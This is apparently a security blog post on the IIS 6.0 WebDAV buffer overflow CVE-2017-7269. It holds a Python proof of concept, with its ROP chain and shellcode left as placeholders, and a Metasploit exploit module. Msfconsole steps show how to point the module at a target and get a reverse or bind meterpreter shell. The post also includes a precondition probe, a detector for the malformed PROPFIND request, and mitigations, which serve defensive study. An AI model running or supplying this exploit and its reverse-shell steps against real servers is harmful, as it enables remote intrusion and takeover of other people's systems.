IIS6.0 Remote Command Execution Vulnerability (CVE-2017-7269)

Talent sets the upper limit of what you can reach; effort sets the lower limit. With the little effort most people put in, talent is far from being the limiting factor.

This article records the IIS 6.0 WebDAV remote command execution vulnerability: background information, how to detect it, and how to exploit it. Most of the material is collected from the Internet; I keep my notes on it here.

Disclaimer: the tools in this article are for personal testing and research only. Delete them within 24 hours of downloading and do not use them for commercial or illegal purposes.

Vulnerability Information

Vulnerability ID: CVE-2017-7269
Discovered by: Zhiniang Peng and Chen Wu (Information Security Lab, School of Computer Science and Engineering, South China University of Technology)
Summary: IIS 6.0 with the WebDAV service enabled has a buffer overflow that allows remote code execution. The public exploit currently works reliably against Windows Server 2003 R2. The vulnerability was first exploited in the wild in July and August 2016.
Vulnerability type: Buffer overflow
Severity: High
Affected product: Microsoft Windows Server 2003 R2 running IIS 6.0 with the WebDAV service enabled (verified; other versions have not been verified)
Vulnerable function: ScStoragePathFromUrl
Additional information: ScStoragePathFromUrl is called twice
Details: A buffer overflow exists in the ScStoragePathFromUrl function of the WebDAV service in IIS 6.0 on Windows Server 2003. An attacker executes arbitrary code by sending a PROPFIND request with an overly long header beginning with "If: <http://".

Exploitation conditions

  • IIS 6.0
  • WebDAV enabled (specifically, the PROPFIND method must be handled; a successful PROPFIND returns 207 or 200)
  • Windows Server 2003 R2
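Before sending anything that could crash the worker process, it is worth confirming the three conditions above from the outside. The probe below is an added example, not code from the original post or from the exploit authors: it sends an OPTIONS request and a harmless Depth: 0 PROPFIND against "/" and reads back the Server banner, the advertised methods and the PROPFIND status. The function names, request bodies and the 200/207/401/405 interpretation are this example's own; the sample responses are constructed, not captured from a real host.

```python
import socket

# Added example: probe the three preconditions listed above (IIS 6.0, WebDAV/PROPFIND
# enabled, PROPFIND answered with 207 or 200). Function names and sample responses are
# this example's own, not the original post's. Samples below are constructed.


def build_options_request(host: str) -> bytes:
    """OPTIONS / asks the server which methods it accepts (Allow / Public headers)."""
    return f"OPTIONS / HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n".encode()


def build_propfind_request(host: str) -> bytes:
    """A minimal, well-formed Depth: 0 PROPFIND on / (RFC 4918); harmless by itself."""
    body = b'<?xml version="1.0"?><D:propfind xmlns:D="DAV:"><D:allprop/></D:propfind>'
    head = (
        f"PROPFIND / HTTP/1.1\r\nHost: {host}\r\nDepth: 0\r\n"
        f"Content-Type: text/xml\r\nContent-Length: {len(body)}\r\n"
        "Connection: close\r\n\r\n"
    ).encode()
    return head + body


def parse_response(raw: bytes):
    """Return (status_code, {lower-cased header name: value}) from a raw HTTP response."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return status, headers


def assess(options_resp: bytes, propfind_resp: bytes) -> dict:
    """Combine both answers into the checks a tester actually cares about."""
    o_status, o_hdr = parse_response(options_resp)
    p_status, p_hdr = parse_response(propfind_resp)
    server = o_hdr.get("server") or p_hdr.get("server") or ""
    advertised = (o_hdr.get("allow", "") + " " + o_hdr.get("public", "")).upper()
    return {
        "iis6": server.startswith("Microsoft-IIS/6."),  # banner can be hidden or faked
        "propfind_advertised": "PROPFIND" in advertised,
        "webdav_answers": p_status in (200, 207),        # the page's success criterion
        "auth_required": p_status == 401,                # WebDAV present but wants creds
        "propfind_status": p_status,
    }


def probe(host: str, port: int = 80, timeout: float = 5.0) -> dict:
    """Live probe. Only run this against hosts you are authorised to test."""
    answers = []
    for req in (build_options_request(host), build_propfind_request(host)):
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(req)
            chunks = []
            while True:
                chunk = s.recv(4096)
                if not chunk:
                    break
                chunks.append(chunk)
        answers.append(b"".join(chunks))
    return assess(*answers)


# Constructed sample responses (not captured traffic) shaped like a vulnerable host's.
SAMPLE_OPTIONS = (
    b"HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/6.0\r\n"
    b"Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK\r\n"
    b"Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, "
    b"PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\nContent-Length: 0\r\n\r\n"
)
SAMPLE_PROPFIND = (
    b"HTTP/1.1 207 Multi-Status\r\nServer: Microsoft-IIS/6.0\r\n"
    b"Content-Type: text/xml\r\nContent-Length: 0\r\n\r\n"
)
SAMPLE_PROPFIND_DISABLED = (
    b"HTTP/1.1 405 Method Not Allowed\r\nServer: Microsoft-IIS/6.0\r\n"
    b"Allow: OPTIONS, TRACE, GET, HEAD\r\nContent-Length: 0\r\n\r\n"
)

if __name__ == "__main__":
    print(assess(SAMPLE_OPTIONS, SAMPLE_PROPFIND))
```

All three of `iis6`, `propfind_advertised` and `webdav_answers` being true is the situation the rest of this page assumes. A 405 or 501 on PROPFIND means the WebDAV extension is not handling the method; a 401 means it is there but the site requires authentication, which the page does not cover. The Server banner is only a hint, since it can be rewritten or removed at the server or a proxy.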

PoC

#------------Our payload set up a ROP chain by using the overflow 3 times. It will launch a calc.exe which shows the bug is really dangerous.
#written by Zhiniang Peng and Chen Wu. Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China
#-----------Email: edwardz@foxmail.com
import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('127.0.0.1', 80))  # replace 127.0.0.1 with the target IP

# PROPFIND request with an empty body; the overflow lives entirely in the If: header
pay = 'PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n'
pay += 'If: <http://localhost/aaaaaaa'
pay += '>'
pay += ' (Not <locktoken:write1>) <http://localhost/bbbbbbb'
# The long UTF-8 byte string appended here (pay += '\xe6...') carries the ROP chain.
# It is garbled beyond reconstruction in this copy of the article; take it verbatim
# from exploit.py at the URL below. The shellcode string has likewise been stripped
# from this copy, so the placeholder below must be replaced from the same file.
shellcode = ''  # placeholder: copy the real string from exploit.py
pay += shellcode
pay += '>\r\n\r\n'  # close the If: tag and terminate the headers
print pay
sock.send(pay)
data = sock.recv(80960)
print data
sock.close()

PoC source: https://github.com/edwardz246003/IIS_exploit/blob/master/exploit.py

Change the IP address in sock.connect(('127.0.0.1', 80)) to the target's IP and run the script; a calc.exe (calculator) process is spawned on the target server.

Exp

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'CVE-2017-7269 Microsoft IIS WebDav ScStoragePathFromUrl Overflow',
      'Description'    => %q{
        Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.
        Original exploit by Zhiniang Peng and Chen Wu.
      },
      'Author'         => [ 'Dominic Chell <dominic@mdsec.co.uk>' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', 'CVE-2017-7269' ],
          [ 'BID', '97127' ],
          [ 'URL', 'https://github.com/edwardz246003/IIS_exploit' ],
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'       => 2000,
          'BadChars'    => "\x00",
          # the payload travels inside a URL-like header, hence the alphanumeric
          # unicode-mixed encoder with ESI as the buffer register
          'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed,
          'DisableNops' => 'True',
          'EncoderOptions' =>
            {
              'BufferRegister' => 'ESI',
            }
        },
      'DefaultOptions' =>
        {
          'EXITFUNC'           => 'process',
          'PrependMigrate'     => true,
          'PrependMigrateProc' => "calc"
        },
      'Targets'        =>
        [
          [
            'Microsoft Windows Server 2003 R2',
            {
              'Platform' => 'win',
            },
          ],
        ],
      'Platform'       => 'win',
      'DisclosureDate' => 'March 26 2017',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(80)
      ], self.class)
  end

  def exploit
    connect
    # same header layout as the original PoC
    buf1 = "If: <http://localhost/aaaaaaa"
    buf1 << ">"
    buf1 << " (Not <locktoken:write1>) <http://localhost/bbbbbbb"
    # The long UTF-8 string appended here (buf1 << "\xe7\xa5\x88...") carries the ROP
    # chain. It is garbled beyond reconstruction in this copy of the article; take it
    # verbatim from the module at the GitHub address below.
    buf1 << payload.encoded
    sock.put("PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n#{buf1}>\r\n\r\n")
    handler
    disconnect
  end
end

github address: https://github.com/dmchell/metasploit-framework/pull/1/commits/9e8ec532a260b1a3f03abd09efcc44c30e4491c2

Usage

Create a new file, e.g. cve-2017-7269.rb, and paste the code above into it (or download the file directly).
Locate the Metasploit installation directory and place cve-2017-7269.rb under modules/exploits/windows/iis/ (for a Metasploit Pro install: /opt/metasploit/apps/pro/msf3/modules/exploits/windows/iis/). (I tried it on a Mac, where the directory is different; I put it in this directory for the convenience of classification management.)

Run msfconsole and load the cve-2017-7269 module:

>use exploit/windows/iis/cve-2017-7269
>set RHOST 192.168.4.244 #Set target IP
>exploit


Running the exploit starts a handler listening on local port 4444. The vulnerable target connects back to that port and returns a meterpreter session (provided the target server can reach your machine).

Run shell commands via meterpreter, or drop to a cmd shell

By default the module uses the reverse_tcp payload, which makes the target server connect back to a port on your machine. You can also switch the payload to bind_tcp, which makes the target listen on a port that you then connect to for the shell.

>set PAYLOAD windows/meterpreter/bind_tcp

After the change, test again.

Run the exploit: the target server listens on port 4444, your machine connects to that port on the target, and a meterpreter session is returned (provided your machine can reach the target server).

Typing show options in the module lists every setting that can be changed; set on its own prints the current values.

Temporary mitigations

  • Disable the WebDAV service (at minimum, stop IIS from handling the PROPFIND method) if it is not needed
  • Put protective equipment (a WAF or IPS) in front of the server to filter the malformed PROPFIND requests
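A WAF or IPS rule only helps if it matches the trigger shape, which the PoC above makes visible: a PROPFIND whose If: header starts with <http://, runs far longer than any legitimate tagged list of lock tokens, and is filled with multi-byte (non-ASCII) UTF-8 sequences. The detector below is an added example, not code from the original post or from the exploit authors: it parses raw request bytes and reports those traits. The 256-byte ceiling, the function names and the three sample requests are this example's assumptions; the samples are constructed, not captured traffic.

```python
import re

# Added example: flag requests shaped like the CVE-2017-7269 trigger. The threshold and
# the names are this example's assumptions, not the original post's. Samples constructed.

IF_HEADER_MAX = 256  # assumed ceiling; legitimate If: values are a few short tagged tokens
NON_ASCII = re.compile(rb"[\x80-\xff]")


def parse_request(raw: bytes):
    """Return (method, [(lower-cased name, value), ...]) from raw HTTP request bytes.

    Headers are kept as a list so a repeated If: header is inspected every time."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method = lines[0].split(b" ", 1)[0]
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if sep:
            headers.append((name.strip().lower(), value.strip()))
    return method, headers


def inspect_request(raw: bytes) -> list:
    """Return the reasons a request matches the trigger shape; an empty list means clean."""
    method, headers = parse_request(raw)
    if method.upper() != b"PROPFIND":
        return []  # the vulnerable path is only reached through PROPFIND
    reasons = []
    for name, value in headers:
        if name != b"if":
            continue
        if value.startswith(b"<http://") and len(value) > IF_HEADER_MAX:
            reasons.append(f"If header is {len(value)} bytes and starts with <http://")
        if NON_ASCII.search(value):
            reasons.append("If header contains non-ASCII bytes")
    return reasons


# Constructed samples (not captured traffic).
BENIGN_PROPFIND = (
    b"PROPFIND /docs/ HTTP/1.1\r\nHost: files.example\r\nDepth: 1\r\n"
    b"If: (<opaquelocktoken:e71d4fae-5dec-22d6-fea5-00a0c91e6be4>)\r\n"
    b"Content-Length: 0\r\n\r\n"
)
# Same header layout as the PoC above; the filler stands in for the ROP/shellcode string.
SUSPICIOUS_PROPFIND = (
    b"PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n"
    b"If: <http://localhost/aaaaaaa> (Not <locktoken:write1>) <http://localhost/bbbbbbb"
    + b"\xe6\x85\xb5" * 200
    + b">\r\n\r\n"
)
# A long If: on any other method does not reach the vulnerable code and is not flagged.
LONG_IF_ON_GET = (
    b"GET / HTTP/1.1\r\nHost: localhost\r\nIf: <http://localhost/" + b"a" * 600 + b">\r\n\r\n"
)

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_PROPFIND),
                          ("suspicious", SUSPICIOUS_PROPFIND),
                          ("get", LONG_IF_ON_GET)):
        print(label, inspect_request(sample))
```

IIS W3C logs record the method, URI and status but not the If: header, so a check like this has to see the raw request: at a reverse proxy, on IDS-reassembled streams, or over pcap payloads. Keep the two traits separate in alerting: an oversized <http:// If: value alone is the strong signal, while non-ASCII bytes on their own can occur in legitimate, badly encoded clients.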

Title: IIS6.0 Remote Command Execution Vulnerability (CVE-2017-7269)

Author: nmask

Published: 2017-03-29 20:03

Last updated: 2019-08-16 15:08

Original link: https://thief.one/2017/03/29/IIS6-0 Remote Command Execution Vulnerability - CVE-2017-7269/

License: Attribution-NonCommercial-NoDerivatives 4.0 International. Please keep the original link and author when reposting.
